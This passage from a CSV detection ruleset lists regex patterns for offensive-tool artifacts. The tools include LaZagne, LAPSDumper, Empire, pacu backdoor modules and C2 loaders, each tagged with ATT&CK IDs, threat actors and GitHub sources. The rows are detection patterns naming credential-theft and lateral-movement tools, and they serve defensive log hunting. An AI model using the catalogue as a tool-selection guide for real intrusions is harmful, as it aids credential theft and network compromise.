T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 
- TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8427" "*/LadonGo/*",".{0,1000}\/LadonGo\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8428" "*/lambda__backdoor_new_roles*",".{0,1000}\/lambda__backdoor_new_roles.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","8429" "*/lambda__backdoor_new_sec_groups*",".{0,1000}\/lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","8430" "*/lambda__backdoor_new_users*",".{0,1000}\/lambda__backdoor_new_users.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","8431" "*/lambdaenum.py*",".{0,1000}\/lambdaenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","8432" "*/LambdaLooter.py*",".{0,1000}\/LambdaLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. 
by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","8433" "*/lanattacks/*",".{0,1000}\/lanattacks\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8434" "*/laps.py *--ldapserver*",".{0,1000}\/laps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","8437" "*/laps.py *-u * -p 
*",".{0,1000}\/laps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","8438" "*/laps.py*",".{0,1000}\/laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8439" "*/laps_dump_*.txt*",".{0,1000}\/laps_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8440" "*/LAPSDumper.git*",".{0,1000}\/LAPSDumper\.git.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","8441" "*/LAPSToolkit.git*",".{0,1000}\/LAPSToolkit\.git.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). 
It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","8442" "*/LAPSToolkit.ps1*",".{0,1000}\/LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8443" "*/LAPSToolkit.ps1*",".{0,1000}\/LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8444" "*/LastenLoader.exe*",".{0,1000}\/LastenLoader\.exe.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 -
TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","8445" "*/Lastenzug.git*",".{0,1000}\/Lastenzug\.git.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","8446" "*/lastpass.py*",".{0,1000}\/lastpass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","8447" "*/Lateral movement.cna*",".{0,1000}\/Lateral\smovement\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8448" "*/Lateral/SMB.cs*",".{0,1000}\/Lateral\/SMB\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 -
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8449" "*/lateral_movement/*",".{0,1000}\/lateral_movement\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8450" 
"*/lateral_movement/*.ps1",".{0,1000}\/lateral_movement\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8451" "*/latest/download/linpeas.sh*",".{0,1000}\/latest\/download\/linpeas\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash 
functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","8452" "*/LatLoader.git*",".{0,1000}\/LatLoader\.git.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","1","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","8454" "*/LatLoader.py*",".{0,1000}\/LatLoader\.py.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","1","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","8455" "*/lazagne.exe*",".{0,1000}\/lazagne\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8456" "*/lazagne.exe*",".{0,1000}\/lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 
TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8457" "*/LaZagne.git*",".{0,1000}\/LaZagne\.git.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","8458" "*/laZagne.py*",".{0,1000}\/laZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","8459" "*/LaZagne.py*",".{0,1000}\/LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8460" "*/lazagne.zip*",".{0,1000}\/lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8461" "*/LaZagne/Windows/*",".{0,1000}\/LaZagne\/Windows\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8462" "*/ldap.py*",".{0,1000}\/ldap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8464" "*/ldap_injection.txt*",".{0,1000}\/ldap_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","8465" "*/ldap_search_bof.py*",".{0,1000}\/ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","8466" "*/ldap-brute.nse*",".{0,1000}\/ldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8467" "*/ldap-checker.py*",".{0,1000}\/ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8468" "*/ldapnomnom.git*",".{0,1000}\/ldapnomnom\.git.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","8469" "*/ldapnomnom/releases/download/*",".{0,1000}\/ldapnomnom\/releases\/download\/.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","8470" "*/ldapnomnom@latest*",".{0,1000}\/ldapnomnom\@latest.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","8471" "*/ldap-novell-getpass.nse*",".{0,1000}\/ldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8472" "*/LDAP-Password-Hunter.git*",".{0,1000}\/LDAP\-Password\-Hunter\.git.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","8473" "*/LDAPPER.git*",".{0,1000}\/LDAPPER\.git.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","8474" "*/ldapper.py*",".{0,1000}\/ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","8475" "*/LDAPPER-master*",".{0,1000}\/LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","8476" "*/ldapph.db*",".{0,1000}\/ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","8477" "*/LdapRelayScan.git*",".{0,1000}\/LdapRelayScan\.git.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","8478" "*/ldap-rootdse.nse*",".{0,1000}\/ldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8479" 